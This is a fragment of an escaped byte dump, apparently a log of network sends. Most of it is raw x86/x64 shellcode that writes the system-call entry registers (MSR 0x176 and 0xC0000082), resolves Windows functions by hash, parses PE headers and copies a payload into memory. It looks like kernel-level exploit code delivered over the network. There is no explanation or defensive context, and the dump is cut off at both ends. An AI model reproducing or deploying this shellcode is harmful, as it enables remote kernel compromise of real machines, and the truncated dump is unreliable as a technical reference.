\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 17, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\